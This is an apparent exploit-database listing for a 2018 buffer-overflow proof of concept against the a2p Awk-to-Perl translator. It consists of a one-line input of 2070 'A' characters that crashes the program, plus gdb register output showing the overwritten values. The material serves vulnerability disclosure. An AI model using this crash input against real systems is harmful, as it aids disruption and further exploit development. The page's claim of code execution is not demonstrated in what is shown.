header-logo
Suggest Exploit
vendor:
Awk to Perl Translator
by:
Todor Donev
7.8
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Awk to Perl Translator
Affected Version From: 1.007-5
Affected Version To: 1.007-5
Patch Exists: NO
Related CWE: N/A
CPE: a:gnu:awk_to_perl_translator:1.007-5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CentOS 6.9, Ubuntu 10
2018

Awk to Perl 1.007-5 – Buffer Overflow (PoC)

A buffer overflow vulnerability exists in Linux Awk to Perl Translator '/usr/bin/a2p' version 1.007-5. By supplying a long string of 'A' characters to the program, a segmentation fault can be triggered. This can be exploited to execute arbitrary code.

Mitigation:

No known mitigation or remediation is available for this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
# Author: Todor Donev
# Date: 2018-07-11
# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
# Version: 1.007-5
# CVE: N/A
# Tested on: CentOS 6.9, Ubuntu 10

[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
Segmentation fault
[todor@adamantium ~]$ gdb a2p --quiet
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install *SNIPED*
(gdb) r bof
Starting program: /usr/bin/a2p bof
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
0x0074ee65 in fgets () from /lib/libc.so.6
(gdb) info reg
eax            0x1060	4192
ecx            0x1	1
edx            0x41414141	1094795585
ebx            0x880ff4	8916980
esp            0xbffff0f0	0xbffff0f0
ebp            0xbffff118	0xbffff118
esi            0x41414141	1094795585
edi            0x8062920	134621472
eip            0x74ee65	0x74ee65 <fgets+53>
eflags         0x210216	[ PF AF IF RF ID ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb)